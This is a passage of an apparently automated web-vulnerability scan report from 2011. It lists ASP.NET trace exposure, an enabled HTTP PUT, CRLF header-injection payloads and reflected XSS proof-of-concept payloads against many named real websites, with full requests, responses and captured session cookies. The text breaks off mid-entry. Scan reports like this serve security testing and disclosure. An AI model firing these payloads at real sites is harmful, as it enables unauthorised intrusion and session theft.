Application-level tracing enables any user to retrieve full details about recent requests to the application, including those of other users. This information includes session tokens and request parameters, which may enable an attacker to compromise other users and even take control of the entire application.

Page-level tracing returns the same information, but relating only to the current request. This may still contain sensitive data in session and server variables which would be of use to an attacker.

Issue remediation

To disable tracing, open the Web.config file for the application, and find the <trace> element within the <system.web> section. Either set the enabled attribute to "false" (to disable tracing) or set the localOnly attribute to "true" (to enable tracing only on the server itself).

Note that even with tracing disabled in this way, it is possible for individual pages to turn on page-level tracing either within the Page directive of the ASP.NET page, or programmatically through application code. If you observe tracing output only on some application pages, you should review the page source and the code behind, to find the reason why tracing is occurring.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.



2.1. http://www.abbyy.com/trace.axd  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbyy.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.abbyy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: UserGuid=PPq8YX0PzAEkAAAAYzc2NzkwYjUtYTIxMC00ZmM4LWJkYmMtOGNlYjhhOTE1NTUw0; expires=Wed, 11-May-2011 01:47:27 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:07:26 GMT
Connection: close
Content-Length: 4536

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.2. http://www.archildrens.org/trace.axd  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.archildrens.org
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.archildrens.org

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:20:33 GMT
Connection: close
Content-Length: 21648

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.3. http://www.chartcrafters.com/trace.axd  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chartcrafters.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.chartcrafters.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4661
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:12:22 GMT
Connection: close

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.4. http://www.egroupnet.com/trace.axd  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.egroupnet.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.egroupnet.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:41:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4633

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.5. http://www.meadonline.com/trace.axd  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meadonline.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.meadonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 02:43:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4867

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

3. HTTP PUT enabled  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.golfweb.ws
Path:   /favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /17db922d7e1d7746.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Issue background

The HTTP PUT method is used to upload data which is saved on the server at a user-supplied URL. If enabled, an attacker can place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.

Issue remediation

You should refer to your platform's documentation to determine how to disable the HTTP PUT method on the server.

Request 1

PUT /17db922d7e1d7746.txt HTTP/1.0
Host: www.golfweb.ws
Content-Length: 16

a4825dc3a5e3b2ac

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Wed, 04 May 2011 00:44:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: http://www.golfweb.ws/17db922d7e1d7746.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /17db922d7e1d7746.txt HTTP/1.0
Host: www.golfweb.ws

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16
Content-Type: text/plain
Last-Modified: Wed, 04 May 2011 00:44:55 GMT
Accept-Ranges: bytes
ETag: W/"368c727cf49cc1:5ee"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:44:54 GMT
Connection: close

a4825dc3a5e3b2ac

4. HTTP header injection  previous  next
There are 7 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://www.all-sports-uniforms.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.all-sports-uniforms.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1698f%0d%0ab6f70370e42 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1698f%0d%0ab6f70370e42 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.all-sports-uniforms.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 03:00:17 GMT
Location: /1698f
b6f70370e42
/


4.2. http://www.criminal-info.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.criminal-info.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fedfb%0d%0aa55c0c94133 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fedfb%0d%0aa55c0c94133 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.criminal-info.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 04:22:22 GMT
Location: /fedfb
a55c0c94133
/


4.3. http://www.deadcellzones.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deadcellzones.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5e6c0%0d%0aa3026e28090 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5e6c0%0d%0aa3026e28090 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.deadcellzones.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 03:48:52 GMT
Location: /5e6c0
a3026e28090
/


4.4. http://www.phonejobsathome.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phonejobsathome.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66f74%0d%0a9c0a7fccf8a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66f74%0d%0a9c0a7fccf8a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phonejobsathome.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 00:54:11 GMT
Location: /66f74
9c0a7fccf8a
/


4.5. http://www.ptworkingathome.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptworkingathome.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2c4f7%0d%0a5a8fd3dab70 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2c4f7%0d%0a5a8fd3dab70 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ptworkingathome.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 03:41:54 GMT
Location: /2c4f7
5a8fd3dab70
/


4.6. http://www.resumagic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resumagic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 84774%0d%0aff21d83b861 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /84774%0d%0aff21d83b861 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.resumagic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 01:49:39 GMT
Location: /84774
ff21d83b861
/


4.7. http://www.solarmovie.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.solarmovie.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 97496%0d%0a811b37d5ad4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /97496%0d%0a811b37d5ad4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.solarmovie.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.1
Date: Wed, 04 May 2011 03:47:19 GMT
Content-Type: text/html
Content-Length: 184
Location: http://www.solarmovie.com/97496
811b37d5ad4
/
Connection: keep-alive

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.0.1</center>
</body>
</html>

5. Cross-site scripting (reflected)  previous  next
There are 31 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://pixel.fetchback.com/serve/fb/pdc [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 7d439<x%20style%3dx%3aexpression(alert(1))>44f729db3c5 was submitted in the name parameter. This input was echoed as 7d439<x style=x:expression(alert(1))>44f729db3c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing7d439<x%20style%3dx%3aexpression(alert(1))>44f729db3c5&sid=2988 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.beam.to/favicon.ico?1'=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1304360759_4895:253215_15758:334759_12704:334759_10164:617491_10638:617491_10640:617491_10641:617491_1437:617491_1660:1181087; sit=1_1304360759_3801:420:0_1714:284953:253215_3306:512579:334759_719:618318:617491_2451:669187:664087_3236:827150:827032_782:1181436:1181087; bpd=1_1304360759_1ZCU5:29L4; apd=1_1304360759; afl=1_1304360759; cre=1_1304360971_29802:59536:1:0_29805:59534:1:661; uid=1_1304360971_1303179323923:6792170478871670; kwd=1_1304360971_11317:617703_11717:617703_11718:617703_11719:617703; scg=1_1304360971; ppd=1_1304360971

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:55 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304472775_4895:365231_15758:446775_12704:446775_10164:729507_10638:729507_10640:729507_10641:729507_1437:729507_1660:1293103; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: uid=1_1304472775_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: kwd=1_1304472775_11317:729507_11717:729507_11718:729507_11719:729507; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: sit=1_1304472775_3801:112436:112016_1714:396969:365231_3306:624595:446775_719:730334:729507_2451:781203:776103_3236:939166:939048_782:1293452:1293103; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: cre=1_1304472775_29802:59536:1:111804_29805:59534:1:112465; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: bpd=1_1304472775_1ZCU5:2cTm; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: apd=1_1304472775; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: scg=1_1304472775; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: ppd=1_1304472775; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: afl=1_1304472775; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Wed, 04 May 2011 01:32:55 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landing7d439<x style=x:expression(alert(1))>44f729db3c5' *not* found -->

5.2. https://tickets.spac.org/TheatreManager/1/login [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://tickets.spac.org
Path:   /TheatreManager/1/login

Issue detail

The value of the e request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a57"><script>alert(1)</script>6cd95a334ae23ba04 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /TheatreManager/1/login?e=35a57"><script>alert(1)</script>6cd95a334ae23ba04&p=&btnPasswordRequest=Forgot+My+Password&C_SEQ=0&param= HTTP/1.1
Host: tickets.spac.org
Connection: keep-alive
Referer: https://tickets.spac.org/TheatreManager/1/online?btnAccount=Account
Cache-Control: max-age=0
Origin: https://tickets.spac.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109962183.1304490783.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utma=109962183.2070296370.1304490783.1304490783.1304490783.1; __utmc=109962183; __utmb=109962183.1.10.1304490783; __utmz=109962183.1304490783.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utma=109962183.2070296370.1304490783.1304490783.1304490783.1; __utmc=109962183; __utmb=109962183.1.10.1304490783; TM7OnlineSales1=ec5e0f501d208f821c7dfdb9f3010d55a8b3693f99bc5300cda607d30b587b5d9ebc418ed2a6d0a7

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:48:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7l DAV/2
Expires: Thu, 01 Jan 1995 01:00:00 GMT
Pragma: no-cache
Content-type: text/html; charset=utf-8
Content-length: 6001
Set-Cookie: __utmz=109962183.1304490783.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; domain=tickets.spac.org; path=/; expires=Thu, 5-MAY-2011 06:48:18 GMT;
Set-Cookie: __utma=109962183.2070296370.1304490783.1304490783.1304490783.1; domain=tickets.spac.org; path=/; expires=Thu, 5-MAY-2011 06:48:18 GMT;
Set-Cookie: __utmc=109962183; domain=tickets.spac.org; path=/; expires=Thu, 5-MAY-2011 06:48:18 GMT;
Set-Cookie: __utmb=109962183.1.10.1304490783; domain=tickets.spac.org; path=/; expires=Thu, 5-MAY-2011 06:48:18 GMT;
Set-Cookie: TM7OnlineSales1=ec5e0f501d208f826f1c94f774d0273c4d4fd000ae29761ecda607d30b587b5de86e13659c1e35c8; domain=tickets.spac.org; path=/; expires=Thu, 5-MAY-2011 06:48:18 GMT;

<HTML><HEAD> <base href="https://tickets.spac.org/1/WebPagesEN/"><TITLE>Login</TITLE>    <link rel="stylesheet" href="tmGifs/styleButtons.css" type="text/css">    <link rel="stylesheet" href="
...[SNIP]...
<INPUT NAME=e TYPE=text VALUE="35a57"><script>alert(1)</script>6cd95a334ae23ba04" SIZE=30>
...[SNIP]...

5.3. http://www.augsburgfortress.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.augsburgfortress.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6c6a0<script>alert(1)</script>939cc2887d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6c6a0<script>alert(1)</script>939cc2887d2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.augsburgfortress.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=36FB6801A0A488DAFFC8918DDF5D1A1B; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: No-cache
Cache-Control: no-cache
Content-Type: text/html
Date: Wed, 04 May 2011 01:19:53 GMT
Content-Length: 29234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" >

<head>

<title>Augsbu
...[SNIP]...
<strong>/favicon.ico6c6a0<script>alert(1)</script>939cc2887d2</strong>
...[SNIP]...

5.4. http://www.dailyadvance.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailyadvance.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a0d1"><script>alert(1)</script>75640254913 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8a0d1"><script>alert(1)</script>75640254913 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailyadvance.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 01:44:47 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9
Set-Cookie: SESS50cc53af8ee153ed39c03e00285c25d5=257efe0b46c4e99c733dc3df491cb62c; expires=Fri, 27-May-2011 05:15:26 GMT; path=/; domain=.dailyadvance.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 01:42:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 15789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
<A href="/user/login?destination=favicon.ico8a0d1"><script>alert(1)</script>75640254913">
...[SNIP]...

5.5. http://www.egroupnet.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.egroupnet.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 40681<script>alert(1)</script>61b8752915a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?40681<script>alert(1)</script>61b8752915a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egroupnet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:41:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1699
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCASDDC=MPODCDDALNNBOKJALCNHDPCH; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
</TABLE>
/favicon.ico?40681<script>alert(1)</script>61b8752915a=1
</BODY>
...[SNIP]...

5.6. http://www.everydaysource.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydaysource.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99fcd"style%3d"x%3aexpression(alert(1))"59ac161962c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99fcd"style="x:expression(alert(1))"59ac161962c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.ico?99fcd"style%3d"x%3aexpression(alert(1))"59ac161962c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.everydaysource.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 88946
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ARRAffinity=7a672d3d079939118ecdd9d64f1f94342ac1ca2739378769d69296f3b3545e50;Path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:56:42 GMT


<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<title>Page not found | EverydaySource.com&reg;</title>
<script
...[SNIP]...
<a href="https://www.everydaysource.com/member/signin?reply=http://www.everydaysource.com/favicon.ico?99fcd"style="x:expression(alert(1))"59ac161962c=1">
...[SNIP]...

5.7. http://www.game-spotting.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.game-spotting.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 529ec<script>alert(1)</script>d474888bd18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

